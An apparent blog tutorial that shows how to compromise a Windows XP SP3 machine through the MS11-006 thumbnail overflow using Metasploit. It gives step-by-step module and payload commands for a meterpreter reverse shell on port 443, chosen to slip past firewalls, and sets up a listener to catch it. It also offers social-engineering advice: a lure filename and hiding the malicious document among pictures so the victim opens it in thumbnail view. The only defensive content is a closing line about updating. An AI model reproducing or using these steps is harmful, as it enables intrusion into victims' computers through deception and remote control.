Type : Tutorial
Level : Medium
Victim O.S : Windows XP SP3
Attacker O.S : Backtrack 5 R1
Why create a tutorial about hacking Windows XP??now is the Windows 7 era so it's better to write down about hacking the Windows 7 than Windows XP. If you've think like what I'm describe before, then you're wrong(but not absolutely 100% wrong). According to this website and this website, Windows XP user were still dominated in this world. There's a lot of people who's uncomfortable when they are migrating into new Operating System, so that's why they still stand in their old O.S.
This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the "Thumbnails" view.
In other words, this type of attack would not work successfully if the user didn't view the malicious file in "Thumbnail" view.
Let's start the preparation and step by step. . .
1. Open your terminal and go to metasploit console by typing msfconsole command, and then load the ms11-006 exploit also with the payload. Below is my configuration picture :
use exploit/windows/fileformat/ms11_006_createsizeddibsection set payload windows/meterpreter/reverse_tcp
2. To view the available switch for this exploit and payload, type show options command. In the picture below I'm just write the needed switch to configured to generate the malicious doc file.
Information :set filename windows7-serial.doc --> social engineering filename to make victim curious to open this malicious file set outputpath /root/Desktop --> put the generated malicious file to our Backtrack 5 R1 desktop set lhost 192.168.8.92 --> attacker IP address / our IP address set lport 443 --> what port you want the victim connect to your PC? Use familiar port that usually allowed by firewall exploit --> generate the malicious file
The default location if you didnt set up the outputpath switch was inside /root/.msf4/data/exploits/ folder, but if you set up the outputpath like mine in above picture it should be on /root/Desktop/.
3. The next step we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
Information :use exploit/multi/handler --> use metasploit handler to listen for any connection set payload windows/meterpreter/reverse_tcp --> should same with the one when you set up the malicious file above set lhost 192.168.8.92 --> your local IP set lport 443 --> port should same with the one when you set up the malicious file above exploit --> start listening
4. Yep everything was set up so nice until this step, the next step you need to send your malicious file and make sure the victim open it in thumbnail view mode. Maybe you can send compressed file with a bunch of picture with your malicious file inside it.
When the victim view our malicious file in Thumbnail mode :
5. Our listener got something and it's already inside the victim computer…
1. Always update your Operating System
Hope you enjoyed 🙂